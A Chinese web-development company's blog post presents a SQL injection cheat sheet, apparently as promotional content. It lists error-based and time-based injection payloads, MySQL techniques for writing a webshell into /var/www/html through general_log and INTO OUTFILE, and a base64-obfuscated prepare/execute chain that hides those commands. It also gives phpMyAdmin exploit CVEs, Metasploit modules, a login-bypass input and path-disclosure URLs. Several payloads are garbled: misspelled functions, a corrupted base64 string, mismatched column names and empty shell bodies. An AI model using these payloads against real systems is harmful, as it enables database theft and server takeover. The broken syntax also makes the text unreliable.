十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
这篇文章主要介绍了SQL注入语法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。
目前创新互联建站已为近1000家的企业提供了网站建设、域名、虚拟主机、网站托管维护、企业网站设计、贵池网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。
仅供参考学习使用。
报错注入
updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+ select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2) select substr(version(),1,1)='X' select substring(version(),1,1)='X'
列名重复报错
select * from (select name_const(version(),1))a; select * from (select name_const((version()),1),name_const((select database()),1))a; select * from (select * from users a join users b)c;
数据溢出报错
select (select(!x-~0) from (select(select user())x)a); select ~0+!(select * from (select user())x);
几何函数报错
multipoint((select * from(select * from(select user())a)b));
case when 语句
select * from datadatabase() case id when 1 else 2 end
时间注入
if right((select database()),a,b)>'s' sleep(5) if assic(substr((select database()),a,b))=98 sleep(5) if assic(substr((select database()) from a to b))=98 sleep(5) if ord(mid((select database()),a,b))=98 sleep(5)
已知物理路径,目录可写,root权限。
查看配置
show variables like '%general';
开启general log模式
set global general_log=on;
设置日志写shell地址*
set global general_log_file="/var/www/html/log.php";
写入shell
select "";
已知物理路径,目录可写
select '' into outfile ‘/var/www/html/1.php'
通过导出表写入shell
use MySQL; create table shell(shell1 text not null); insert into shell(cmd1) values(''); select cmd1 from a into outfile '/var/www/html/1.php';
mysql from_base64函数利用
利用base64编码来加密,然后使用自定义变量接到,在使用prepare和EXECUTE来执行语句,完成日志写shell的操作。
set
set 用户定义一个变量,变量里面是sql可以执行的语句。
prepare
prepare name from value;
prepare 语句用于预备一个语句,并指定名称name,然后引用改语句。
execute
execute 语句用于执行预备的语句。
联合起来利用
set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg==')); /*set global general_log=on*/ PREPARE name from @sql; EXECUTE name; set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg==')); /*set global general_log_file="C:\\MYOA\\webroot\\login.php"*/ PREPARE name from sql2; EXECUTE name; select ""; set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg==')); /*set global general_log = off*/ PREPARE name from @sql3; EXECUTE name;
phpmyadmin存在pregreplaceeval漏洞
影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 CVE-2013-3238
phpmyadmin存在serversync.php后门漏洞
影响版本 phpmyadmin v3.5.2.2
msf利用模块 : exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159
phpmyadmin 配置文件/config/config.inc.php存在命令执行漏洞
影响版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
msf利用模块:exploit/unix/webapp/phpmyadmin_config CVE-2009-1151
登录处漏洞
利用方法:用户名处写入'localhost'@'@"
影响版本:2.113/2.114
php爆绝对路径
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
感谢你能够认真阅读完这篇文章,希望小编分享的“SQL注入语法有哪些”这篇文章对大家有帮助,同时也希望大家多多支持创新互联,关注创新互联行业资讯频道,更多相关知识等着你来学习!